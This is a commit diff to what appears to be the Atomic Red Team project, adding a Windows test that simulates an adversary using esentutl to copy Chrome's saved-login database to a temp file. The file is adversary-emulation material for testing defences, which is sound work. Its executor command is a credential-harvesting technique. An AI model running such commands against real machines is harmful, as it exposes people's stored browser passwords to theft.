Adding T1555.003 Test - Dump Chrome Login Data with esentutl (#2628)

Co-authored-by: Carrie Roberts <[email protected]>

atomics/T1555.003/T1555.003.yaml

@@ -467,3 +467,32 @@ atomic_tests:
       Copy-Item "PathToAtomicsFolder\..\ExternalPayloads" -Destination "$env:localappdata\Google\Chrome\User Data\Default\Login Data" > $null
       Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\Login Data" > $null
     name: powershell
+- name: Dump Chrome Login Data with esentutl
+  description: |
+    This test simulates an adversary using esentutl to dump encrypted credentials from Google Chrome's Login database.
+    [Reference](https://actzero.ai/resources/blog/hygiene-tip-shut-down-attackers-harvesting-cached-browser-credentials/)
+  supported_platforms:
+  - windows
+  input_arguments:
+    output_path:
+      description: File path for login data dump
+      type: string
+      default: '%temp%\T1555.003_Login_Data.tmp'
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Chrome must be installed
+    prereq_command: 'if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1}'
+    get_prereq_command: |
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      $installer = "PathToAtomicsFolder\..\ExternalPayloads\ChromeStandaloneSetup64.msi"
+      Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\ChromeStandaloneSetup64.msi" https://dl.google.com/chrome/install/googlechromestandaloneenterprise64.msi
+      msiexec /i $installer /qn
+      Start-Process -FilePath "chrome.exe"
+      Stop-Process -Name "chrome"
+  executor:
+    name: command_prompt
+    command: |
+      esentutl.exe /y "%LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data" /d "#{output_path}"
+    cleanup_command: |
+      del /f /q #{output_path} > nul 2>&1